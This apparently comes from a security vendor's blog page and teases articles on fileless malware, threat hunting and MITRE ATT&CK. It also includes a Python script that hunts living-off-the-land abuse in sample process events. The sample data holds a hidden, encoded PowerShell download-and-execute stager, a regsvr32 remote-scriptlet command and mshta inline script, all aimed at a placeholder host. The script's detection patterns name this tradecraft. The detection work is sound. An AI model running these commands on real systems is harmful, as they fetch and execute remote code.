How credible is the threat, and how do we stop it?
In order to address the evolving threat landscape, the security industry has turned to more comprehensive endpoint protection platforms. What are they?
Unlike attacks carried out with traditional malware, fileless malware attacks don't require the attacker to install any software on the victim's machine. Instead, adversaries hijack tools built into Windows and use them to carry out the attack. Essentially, Windows is turned against itself.
In Q1 2018, fileless attacks were up 94%. Learn what fileless malware is, with common examples from the Cybereason Nocturnus team's research.
Many find the process of threat hunting to be too demanding. What are you supposed to hunt? Where do you even begin?
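The fileless technique described above (built-in Windows tools turned against the host) also answers the "where do you begin" question for threat hunting: start with process-creation telemetry and look for the handful of built-in binaries adversaries abuse most. The script below is an added example, not Cybereason's code or research output. It runs a few living-off-the-land heuristics over constructed, Sysmon-style process-creation events (the field names Image, ParentImage and CommandLine and the sample events are assumptions), decodes a PowerShell -EncodedCommand payload, and reports why each event was flagged.

```python
"""Hunt for living-off-the-land (fileless) tradecraft in process-creation events.

Added example, not Cybereason's code. The events below are constructed to
resemble Sysmon Event ID 1 fields; the schema and sample values are assumptions.
"""
import base64
import re

# Constructed sample: the encoded PowerShell stager is generated here so the
# sample event is reproducible without hand-written base64.
_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.com/a')"
_ENC = base64.b64encode(_STAGER.encode("utf-16le")).decode()

SAMPLE_EVENTS = [
    {"id": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {_ENC}"},
    {"id": 2, "Image": r"C:\Windows\System32\regsvr32.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "regsvr32.exe /s /n /u /i:http://example.com/x.sct scrobj.dll"},
    {"id": 3, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'mshta.exe vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""calc""")'},
    # Looks suspicious at a glance but is typical of scheduled admin automation:
    # -ExecutionPolicy Bypass alone is deliberately NOT a rule here; baseline it instead.
    {"id": 4, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1"},
    {"id": 5, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe C:\\Users\\a\\notes.txt"},
]

# Command-line heuristics for commonly abused built-in binaries.
RULES = [
    ("powershell_encoded",
     re.compile(r"\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("powershell_hidden_noprofile",
     re.compile(r"\s-(nop|noprofile)\b.*\s-w(indowstyle)?\s+hidden", re.I)),
    ("regsvr32_scrobj", re.compile(r"regsvr32.*(/i:https?://|scrobj\.dll)", re.I)),
    ("mshta_inline_script", re.compile(r"mshta.*\b(vbscript|javascript):", re.I)),
    ("rundll32_inline_script", re.compile(r"rundll32.*\bjavascript:", re.I)),
    ("certutil_download_or_decode", re.compile(r"certutil.*-(urlcache|decode)\b", re.I)),
]

# Parent/child pairing: an Office document should not be launching a script host.
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")
SCRIPT_HOSTS = ("powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe")


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = re.search(r"\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def hunt(events):
    """Return {event id: [reasons]} for events that match any heuristic."""
    hits = {}
    for ev in events:
        cmd = ev["CommandLine"]
        reasons = [name for name, rx in RULES if rx.search(cmd)]
        if basename(ev["ParentImage"]) in OFFICE_PARENTS and basename(ev["Image"]) in SCRIPT_HOSTS:
            reasons.append("office_spawns_script_host")
        decoded = decode_encoded_command(cmd)
        if decoded and re.search(r"DownloadString|DownloadFile|IEX|Invoke-Expression|FromBase64String",
                                 decoded, re.I):
            reasons.append("decoded_payload_downloads_or_evals")
        if reasons:
            hits[ev["id"]] = reasons
    return hits


if __name__ == "__main__":
    for event_id, reasons in hunt(SAMPLE_EVENTS).items():
        print(event_id, ", ".join(reasons))
```

Each rule maps to a specific abuse of a built-in binary rather than to a file hash, which is the point of hunting fileless activity: there is no dropped executable to match, so the command line, the parent process and the decoded payload are the evidence. Event 4 is left unflagged on purpose; execution-policy bypasses are common in legitimate automation, and a hunt that alerts on them without a baseline drowns the three real hits.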
During the recent MITRE evaluations, it became apparent that many security vendors, while able to detect threats, were doing so well after the fact. It's important to consider what these delayed detections would mean for a SOC experiencing a real breach.
The MITRE ATT&CK framework is a complex solution to a complex problem. Rather than simply scoring vendors on a linear scale, it offers a more profound view of capabilities, applicability, and use-case. This is what you need to know about the way MITRE uses ATT&CK to evaluate security vendors, and how threat hunting factors into the ATT&CK framework.